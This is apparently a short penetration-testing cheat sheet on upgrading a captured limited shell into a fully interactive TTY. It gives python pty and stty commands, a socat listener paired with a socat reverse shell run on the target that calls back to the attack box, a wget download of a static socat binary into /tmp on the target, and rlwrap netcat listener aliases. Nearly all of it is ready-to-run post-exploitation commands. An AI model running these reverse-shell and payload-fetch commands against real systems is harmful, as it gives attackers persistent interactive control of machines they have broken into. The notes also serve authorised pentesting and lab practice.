Upgrading Shells

A list of methods to upgrade shells to fully interactive TTYs!

Python PTY Upgrade

Run the following command in the limited shell:

python -c 'import pty; pty.spawn("/bin/bash")'

The shell will now look prettier and have some TTY capabailities. To make it have full interactivty, use the following command to give access to term commands such as clear:

export TERM=xterm

Finally, background the shell with [Ctrl-Z] option, then from the attack box, use the following command. This will turn off the attack box's terminal echo which gives autocompletes and arrow keys. Then it will foreground the shell again.

stty raw -echo
fg

If this works, it will end as a fully interactive TTY shell. Sometimes, it might also be useful to modify the terminal tty size. This can be done by checking your attack box's values and then copying them over with the following:

# Attack box - gives row and column length
stty -a
# Shell
stty rows $ROW_LENGTH
stty cols $COL_LENGTH

Socat Upgrade

The following method uses socat to create a second reverse shell for a fully interactive shell through the following methodology.

On the attack box, create a listener:

socat file:`tty`,raw,echo=0 tcp-listen:4444

On the target, launch a reverse shell:

socat exec:'bash-li',pty,stderr,setsid,sigint,sane tcp:$IP:4444

If socat is missing, it can be installed using a static generated version with the following command:

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat
chmod +x /tmp/socat

RLWrap Upgrade

The program rlwrap gives access to history, tab autocompletion, and the arrow keys immediately upon receiving a shell. Sometimes, manual stabilization must still be utilized for interrupts like [Ctrl-C] to be used.

rlwrap nc -nvlp $PORT

Often times, this can be an alias as well to overwrite a listener.

alias listener='sudo rlwrap nc -nvlp'

Last updated